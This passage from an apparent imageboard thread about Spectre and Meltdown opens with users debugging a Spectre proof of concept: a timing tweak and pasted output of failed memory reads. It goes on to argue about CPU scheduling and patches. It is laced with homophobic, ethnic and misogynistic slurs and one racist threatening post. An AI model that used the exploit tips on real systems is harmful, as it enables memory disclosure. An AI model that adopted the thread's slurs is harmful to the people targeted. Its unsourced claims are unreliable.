printf("0x%02X=’%c’ score=%d ", value[0],
I know I can fixt the (80) error.
▶ No.848011>>848016
>>848009
rdtscp(&junk) => rdtsc()
rdtsc not rdtscp
▶ No.848012
>>848009
also i used the code from this thread instead of github
▶ No.848016>>848018
>>848011
The output does not have success.
Reading 40 bytes:
Reading at malicious_x = 0xffffffffffdfeef8... Unclear: 0xFE=’?’ score=999 (second best: 0xFD score=999)
Reading at malicious_x = 0xffffffffffdfeef9... Unclear: 0xFF=’?’ score=999 (second best: 0xFD score=999)
Reading at malicious_x = 0xffffffffffdfeefa... Unclear: 0xFD=’?’ score=999 (second best: 0xFB score=999)
Reading at malicious_x = 0xffffffffffdfeefb... Unclear: 0xFF=’?’ score=999 (second best: 0xFD score=999)
Reading at malicious_x = 0xffffffffffdfeefc... Unclear: 0xFF=’?’ score=999 (second best: 0xFE score=999)
Reading at malicious_x = 0xffffffffffdfeefd... Unclear: 0xFF=’?’ score=999 (second best: 0xFE score=999)
Reading at malicious_x = 0xffffffffffdfeefe... Unclear: 0xFE=’?’ score=999 (second best: 0xFD score=999)
Reading at malicious_x = 0xffffffffffdfeeff... Unclear: 0xFF=’?’ score=999 (second best: 0xFA score=999)
Reading at malicious_x = 0xffffffffffdfef00... Unclear: 0xFF=’?’ score=999 (second best: 0xFE score=999)
Reading at malicious_x = 0xffffffffffdfef01... Unclear: 0xFF=’?’ score=999 (second best: 0xFE score=999)
Reading at malicious_x = 0xffffffffffdfef02... Unclear: 0xFE=’?’ score=999 (second best: 0xFC score=999)
Reading at malicious_x = 0xffffffffffdfef03... Unclear: 0xFF=’?’ score=999 (second best: 0xFE score=999)
Reading at malicious_x = 0xffffffffffdfef04... Unclear: 0xFF=’?’ score=999 (second best: 0xFE score=999)
Reading at malicious_x = 0xffffffffffdfef05... Unclear: 0xFF=’?’ score=999 (second best: 0xFD score=999)
Reading at malicious_x = 0xffffffffffdfef06... Unclear: 0xFD=’?’ score=999 (second best: 0xFC score=999)
Reading at malicious_x = 0xffffffffffdfef07... Unclear: 0xFF=’?’ score=999 (second best: 0xFE score=999)
Reading at malicious_x = 0xffffffffffdfef08... Unclear: 0xFF=’?’ score=999 (second best: 0xFE score=999)
Reading at malicious_x = 0xffffffffffdfef09... Unclear: 0xFF=’?’ score=999 (second best: 0xFE score=999)
Reading at malicious_x = 0xffffffffffdfef0a... Unclear: 0xFF=’?’ score=999 (second best: 0xFC score=999)
Reading at malicious_x = 0xffffffffffdfef0b... Unclear: 0xFE=’?’ score=999 (second best: 0xFD score=999)
Reading at malicious_x = 0xffffffffffdfef0c... Unclear: 0xFF=’?’ score=999 (second best: 0xFD score=999)
Reading at malicious_x = 0xffffffffffdfef0d... Unclear: 0xFF=’?’ score=999 (second best: 0xFE score=999)
Reading at malicious_x = 0xffffffffffdfef0e... Unclear: 0xFE=’?’ score=999 (second best: 0xFD score=999)
Reading at malicious_x = 0xffffffffffdfef0f... Unclear: 0xFD=’?’ score=999 (second best: 0xFC score=999)
Reading at malicious_x = 0xffffffffffdfef10... Unclear: 0xFF=’?’ score=999 (second best: 0xFE score=999)
Reading at malicious_x = 0xffffffffffdfef11... Unclear: 0xFE=’?’ score=999 (second best: 0xFD score=999)
Reading at malicious_x = 0xffffffffffdfef12... Unclear: 0xFE=’?’ score=999 (second best: 0xFB score=999)
Reading at malicious_x = 0xffffffffffdfef13... Unclear: 0xFF=’?’ score=999 (second best: 0xFE score=999)
Reading at malicious_x = 0xffffffffffdfef14... Unclear: 0xFF=’?’ score=999 (second best: 0xFE score=999)
Reading at malicious_x = 0xffffffffffdfef15... Unclear: 0xFF=’?’ score=999 (second best: 0xFC score=999)
Reading at malicious_x = 0xffffffffffdfef16... Unclear: 0xFE=’?’ score=999 (second best: 0xFD score=999)
Reading at malicious_x = 0xffffffffffdfef17... Unclear: 0xFF=’?’ score=999 (second best: 0xFE score=999)
Reading at malicious_x = 0xffffffffffdfef18... Unclear: 0xFC=’?’ score=999 (second best: 0xF9 score=999)
Reading at malicious_x = 0xffffffffffdfef19... Unclear: 0xFF=’?’ score=999 (second best: 0xFE score=999)
Reading at malicious_x = 0xffffffffffdfef1a... Unclear: 0xFF=’?’ score=999 (second best: 0xFD score=999)
Reading at malicious_x = 0xffffffffffdfef1b... Unclear: 0xFF=’?’ score=999 (second best: 0xFE score=999)
Reading at malicious_x = 0xffffffffffdfef1c... Unclear: 0xFD=’?’ score=999 (second best: 0xFC score=999)
Reading at malicious_x = 0xffffffffffdfef1d... Unclear: 0xFF=’?’ score=999 (second best: 0xFE score=999)
Reading at malicious_x = 0xffffffffffdfef1e... Unclear: 0xFF=’?’ score=999 (second best: 0xFE score=999)
Reading at malicious_x = 0xffffffffffdfef1f... Unclear: 0xFF=’?’ score=999 (second best: 0xFD score=999)
any tweaks?
▶ No.848018>>848023
>>848016
looks good for you, did you update to the latest kernel?
i test it on my x200 booting from live usb ubuntu and it can see the texts, try a few times, the results varies from time to time
▶ No.848020
>>848002
Those browsers won't get the fix until they update to 57+ you tard.
▶ No.848023>>848027
>>848018
Tried a couple, absolutely nothing.
kernel (I know I should upgrade to 4.9, if they have KPTI with grsec kernel.)
4.8.17-hardened-r2-gnu
▶ No.848027>>848029
>>848023
ur good to go i guess,
time for me to actually use something secure
▶ No.848029
>>848027
I'll keep trying.
▶ No.848033
>>847597
>That's it. Wii Linux is my daily driver from now on.
>>847624
>not already having switched off of x86 for web browsing and only keeping x86 for legacy vidya
>using a rooted console for general computing and keeping a PC for gaymes
the levels of autism on this website exceed my expectations
▶ No.848035
>>847608
Nope, too expensive. The whole idea of stream computing AKA "GPUs" is to make the cores as fucking simple as possible to maximise bang-per-transistor, and then whip out as many of those cores as possible in a given transistor/power budget. A feature only goes in if performance increase is higher than increase in circuitry size and/or power draw.
▶ No.848040
>>847983
>For /tech/ posters, half of whom are using old c2d thinkpads
...and here I thought that I fit in on /tech/. Apparently my Tegra2 netbook I'm writing this on makes me a filthy outsider.
▶ No.848044>>848209
>>847615
I believe Microsoft Research once worked on an OS architecture like this. Interesting stuff, but it wouldn't help against attacks like these. You can exploit those bugs from fucking JITted JavaScript, of all things.
▶ No.848048>>848060 >>848062
>>847633
This has already been done to hell and back, with miserable results. The magical compilers that wizardly know the perfect instruction execution order beforehand never materialised BECAUSE IT'S LITERALLY IMPOSSIBLE YOU RETARDED FAGGOT. The optimal order changes on each execution due to variable latency operations like memory accesses, FP operations (remember denormal and NaN corner cases) and everything that can throw a fucking exception. Not to mention that free EUs vary depending on preceding code at every branch merge.
The clusterfuck you're describing is called VLIW and is now used only in things like DSP cores that execute extremely simple and predictable code with very few branching paths. It's FUBAR for everything else.
▶ No.848058>>848136
>one of the people who bought an Intel 330 motherboard back in the day just for shits
>it was OK but I retired it long ago even from server duties
>read that it's one of the very few Intel CPUs immune to both these attacks
>could be the very newest and fastest one out there
hahahahaha first gen atom users will have their revenge for buying these things, forgetting about them, and them being mocked about it
▶ No.848060>>848568
>>848048
>The optimal order changes on each execution due to variable latency operations like memory accesses, FP operations (remember denormal and NaN corner cases)
>Not to mention that free EUs vary depending on preceding code at every branch merge.
Well I didn't say it was going to be easy. You need perfect code to do something like abandoning on die schedulers for reducing heat. But with the pajeets and shit code of literally every OS today it would have to be rewrote from the ground up to achieve such a feet. Ontop of the proccessors silicone having to be fabricated to a more rigid standard for more consistent programs executing on the silicone.
>used only in things like DSP cores that execute extremely simple and predictable code with very few branching paths.
Again I didn't say it would be easy, all code and compilers are pajeet tier shit today. It would need to be rewrote from the ground up to be simpler and easier to control. But it is the only way foward as x86 has hit it's heat-death limit.
▶ No.848062>>848568
>>848048
>The magical compilers that wizardly know the perfect instruction execution order beforehand never materialised
That's because most software writers have no fucking clue what they are doing with the layers upon layers of abstraction, a poor quality of work from the assembly up in compilers, and or both. Terry davis built a fucking compiler himself in a few years singlehandedly. It has taken those faggots at GCC, LLVM, and MVS decades and hundreds of people in cheap manpower to build said compilers. Which still get updated for bug fixes every so often.
We need better engineers who know what the fuck they are doing to build the foundation, then you can have your rust and C like languages that hold your hand every step of the way.
▶ No.848063>>848065
>>847615
We need to abandon the multi user paradigm for single user terminals completely, every "user" OS should be made for one user at a time. Think like Smalltalk or a Lisp machine. A lot of these problems are cropping up because of multiple privilege level bullshit (speculative execution exploit exposes memory across privilege levels) and a single USER DEVELOPER OS could be locked down tighter than a nun's cunt. Terry's on to something with his OS.
▶ No.848065>>848073
>>848063
Only all the driver shit prevents simply using minix3 for everything that is clusterfucked in the linux kernel and win kernel
▶ No.848073
>>848065
I watched the recent CCC talk by that Russian hacker on the IME, and he claims that the minix onboard it is significantly altered from mainline, almost everything is changed but he didn't elaborate further.
▶ No.848095>>848150
>>846665
All Intel chips since 1995 have been affected.
insider knowledge, this is all i can disclose
▶ No.848120
Anybody know if Transmeta’s affected?
▶ No.848136
>>848058
I retired my D945GCLF2 board this November, in favour of 15h AMD A-series APU. It's still usable but CPU fan fried (and it was replaced once already) - maybe I should make a new box for sensitive data usage and leave this desktop for multimedia use...
▶ No.848150
>>848095
>insider knowledge
can you post some pics as proof you larping faggot?
this info i can find online
▶ No.848209>>848343
>>846659
>consent can be retroactively withdrawn at any time without notification
Sounds like they were unfortunate enough to work with a feminist.
>>846907
I love the full disclosure policy that OpenBSD is so infamous for. It's an embarrasement that not all free software projects have adopted it.
>>847755
>mfw when both my desktop computers run AMD64
>>847176
>implying all Germans are nazis
>>847296
>shilling this hard against privacy
>>847418
>not doxing yourself
WEW LAD!
>>847308
x86 is a buggy as hell trainwreck and needs to be replace as soon as possible.
>>847354
My body is ready for this.
>>848044
If was about writing a secure OS, then you can but all you want that Microsoft dropped funding when they found out what their experts were up to.
▶ No.848214
Is Spectre interprocess? The pdf's example code is single process.
▶ No.848315
▶ No.848333
>>847755
Here's that second errata Theo mentioned on geek.com, wew. It's pretty bad when some of the potential problems can be easily explained to normies, like AE30 here.
▶ No.848343
>>848209
>as soon as possible.
Maybe in a year :DDDDDDDDDDD
▶ No.848365>>848367 >>848767
>>847410
>APPLE fixed this last month in OS X UNIX(tm)
CromeOS also patched this last month with CromeOS 63
>https://support.google.com/faqs/answer/7622138#chromeos
LINUX BTFO x2
▶ No.848367
>>848365
be sure to include another backdoor that can now send data over net without exploits ;)
▶ No.848508>>848540
Were coming for your white babies. All ten million of them.
▶ No.848540
▶ No.848568>>848611
>>848060
>>848062
Did you read what I wrote!? THIS IS LITERALLY UN-FUCKING-POSSIBLE!
There is no "perfect" fixed scheduling order. The optimal order is different on each invocation of a code sequence. This means that an execution schedule that is pre-baked at compile time is going to be suboptimal most of the time - regardless of the schedule.
>Terry davis built a fucking compiler himself in a few years singlehandedly
At my uni, writing a compiler has been a mandatory freshman term project for decades. It's not that fucking hard. Then again, I'm living in eastern yuroland where diversity quotas are not yet a thing and faggots who fail can be dropped without repercussions.
>It has taken those faggots at GCC, LLVM, and MVS decades and hundreds of people in cheap manpower to build said compilers.
Writing a simple compiler that werks is one thing. Writing one that generates well-optimised code for multiple platforms while faithfully implementing complex standards and quirks of other compilers for compatibility with existing source code is another.
▶ No.848611>>848616
>>848568
>uni
>europoor
Did you not read what else I wrote?
>Ontop of the proccessors silicone having to be fabricated to a more rigid standard for more consistent programs executing on the silicone.
Improving the chink manufacturing standards would fix that. Or hell not sending it all to the chinks to make with slave labor to begin with.
>Writing one that generates well-optimised code for multiple platforms while faithfully implementing complex standards and quirks of other compilers for compatibility with existing source code is another.
And writing one that accounts for subtle differences in the silicone of a single architecture and yet is well optimized with security is another. Of which that doesn't exist yet. Idiots like you are the cancer that is killing and holding back proccessor technology.
▶ No.848616
>>848611
>Improving the chink manufacturing standards would fix that.
Variable instruction latencies have nothing to do with "manufacturing standards" you retarded idiot. You can't predict whether a memory read will be served in 4 cycles from L1, in 200 cycles from RAM, or cause a fucking page fault that jumps to a kernel handler doing who-knows-what with it. The variability is in this instruction's very nature, and it's just one example.
>Idiots like you are the cancer that is killing and holding back proccessor technology.
And u suk cox. Come back when you learn something about how processors work.
▶ No.848656
>You can't predict whether a memory read will be served in 4 cycles from L1, in 200 cycles from RAM, or cause a fucking page fault that jumps to a kernel handler doing who-knows-what with it. The variability is in this instruction's very nature, and it's just one example.
Yes you can predict it, by accounting for the interface at compile time and by making the assembly language account for such things in its instruction set while also having perfect no crash and no faulting assembly with expections for edge cases. Then you can obfuscate it up the stack via things like a compiler and languages. Sure it complicates the fuck out of the assembly language but it is way more effiecient too.
▶ No.848677
>>846180 (OP)
>>846627
>>846627
>>846627
i have drawn this more than 15 years ago :)
▶ No.848767
>>848365
They copied the fix from the OBSD, because they sit downstream of them. GoogleOS is still a backdoored piece of garbage with easy priv escalation methods root a box.
Linux is even worse garbage, but nothing comes close to the absolute disaster of a code base that is winshit.
▶ No.849996
This news has alread slid off the normie web more or less, the lying fake news is doing its job.
▶ No.850034>>850435
IS THERE A KERNEL CONFIG OPTION TO DISABLE THIS SHIT YET?
▶ No.850435>>850439
>>850034
I think it only slows down 35% if cpu is intel, if cpu is amd then not, set your cpu AMD to not use the degradation
▶ No.850439
>>850435
"set" you can manually patch out the patchin the source
▶ No.850896
https://youtu.be/LC1WuKdPVCQ
Doesn't look like too much of a performance drop. I wish DF did Linux videos
▶ No.851102
>>846634
>mfw I use covfefe lake